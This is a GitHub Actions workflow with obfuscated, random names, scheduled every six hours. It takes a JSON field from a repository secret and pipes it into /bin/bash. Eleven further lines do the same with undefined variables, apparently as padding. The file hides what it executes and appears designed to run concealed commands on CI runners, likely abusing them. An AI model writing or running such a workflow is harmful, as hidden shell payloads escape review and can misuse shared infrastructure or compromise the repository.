name: yuchangkan3910
on:
  workflow_dispatch:
  schedule:
    - cron: '31 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuchangkan3910
        env:
          gbfdh756: ${{ secrets.gbfdh756 }}
        run: |
          echo $gbfdh756 | jq -r .jbdv10 | /bin/bash
          echo $oape144 | jq -r .q2 | /bin/bash
          echo $or75 | jq -r .akkwp61575 | /bin/bash
          echo $hq50 | jq -r .selwv77570 | /bin/bash
          echo $edge028 | jq -r .v147 | /bin/bash
          echo $u01 | jq -r .sxjdo096 | /bin/bash
          echo $yyyxm236 | jq -r .dnr73 | /bin/bash
          echo $m007 | jq -r .kd71 | /bin/bash
          echo $qzs0489 | jq -r .mrjn24 | /bin/bash
          echo $nieq81 | jq -r .k9 | /bin/bash
          echo $lbocz53 | jq -r .ktksw6 | /bin/bash
          echo $jmr84469 | jq -r .bzpt633 | /bin/bash

